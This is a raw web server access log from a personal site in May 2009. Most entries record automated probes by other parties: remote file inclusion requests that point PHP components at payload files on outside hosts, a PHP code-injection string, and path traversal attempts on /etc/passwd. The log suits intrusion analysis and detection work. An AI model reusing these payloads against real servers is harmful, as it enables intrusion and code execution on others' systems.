218.38.243.71 - - [05/May/2009:10:53:50 -0700] "GET /logs////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 98196 "-" "Mozilla/5.0" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:10:53:50 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:53:52 -0700] "GET /logs////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 98196 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:53:53 -0700] "GET /logs/access_080425.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:53:56 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:53:56 -0700] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:53:57 -0700] "GET /logs/access_080511.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:53:59 -0700] "GET /logs/access_080223.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:54:01 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:54:01 -0700] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:54:01 -0700] "GET /logs/access_080511.log%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:54:03 -0700] "GET /logs/access_080223.log%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:05 -0700] "GET /logs/access_080425.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
136.1.1.101 - - [05/May/2009:10:54:12 -0700] "GET /bikes/dteel/Temp/IMG_3454s.JPG HTTP/1.1" 200 277018 "http://www.st-owners.com/forums/showthread.php?t=63518&page=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; F-6.0SP2-20041109; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:13 -0700] "GET /logs////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 98196 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:10:54:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:29 -0700] "GET /logs/access_080331.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:29 -0700] "GET /logs/access_080425.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:10:54:30 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:31 -0700] "GET /logs////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 98196 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:34 -0700] "GET /logs/access_080331.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:39 -0700] "GET /logs/access_080425.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:48 -0700] "GET /logs/access_080411.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:56 -0700] "GET ///?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 42936 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:54:58 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:55:01 -0700] "GET /logs/access_080331.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:55:01 -0700] "GET /logs////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 98196 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:10:55:04 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 200 4407 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:55:07 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:55:07 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:10:55:07 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:10:55:07 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 200 4406 "-" "libwww-perl/5.805" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:55:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:55:14 -0700] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:55:14 -0700] "GET /logs/access_080511.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:55:16 -0700] "GET /logs/access_080223.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:10:55:22 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:55:30 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:55:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:55:35 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:55:35 -0700] "GET /logs///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:55:35 -0700] "GET /logs/access_080313.log///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.172.224.21 - - [05/May/2009:10:55:38 -0700] "GET /logs/access_090109.log/?t=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:55:39 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
80.172.224.21 - - [05/May/2009:10:55:43 -0700] "GET /logs/?t=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 98189 "-" "libwww-perl/5.825" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:55:48 -0700] "GET ///?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 42936 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:10:55:50 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:55:54 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:56:00 -0700] "GET ///?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:56:00 -0700] "GET ///?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:10:56:07 -0700] "GET /logs/access_080411.log////?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.172.224.21 - - [05/May/2009:10:56:18 -0700] "GET /?t=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 42978 "-" "libwww-perl/5.825" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:10:56:21 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:10:56:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:10:56:21 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:10:56:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:10:56:24 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:10:56:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:10:56:25 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:10:56:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:10:56:25 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:10:56:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:10:56:25 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:10:56:26 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:10:56:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:10:56:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:10:56:27 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:10:56:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:10:56:28 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:10:56:33 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:10:56:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:10:56:55 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:10:56:59 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:10:57:02 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:10:57:04 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:10:57:04 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:10:57:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:10:57:05 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:10:57:06 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:10:57:07 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:10:57:09 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:10:57:13 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:10:57:33 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:10:57:39 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.172.224.21 - - [05/May/2009:10:57:41 -0700] "GET /logs/access_081010.log/?t=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:10:57:47 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:10:57:47 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:10:57:48 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:10:57:48 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:10:57:48 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:10:57:49 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
199.238.145.120 - - [05/May/2009:10:58:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:10:58:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:10:58:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:10:59:03 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:10:59:07 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:59:21 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/rina212/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.215.123 - - [05/May/2009:10:59:33 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.241.215.123 - - [05/May/2009:10:59:33 -0700] "GET /logs/access_071215.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.241.215.123 - - [05/May/2009:10:59:33 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:59:52 -0700] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:59:52 -0700] "GET /logs/access_080201.log///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:59:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:59:53 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
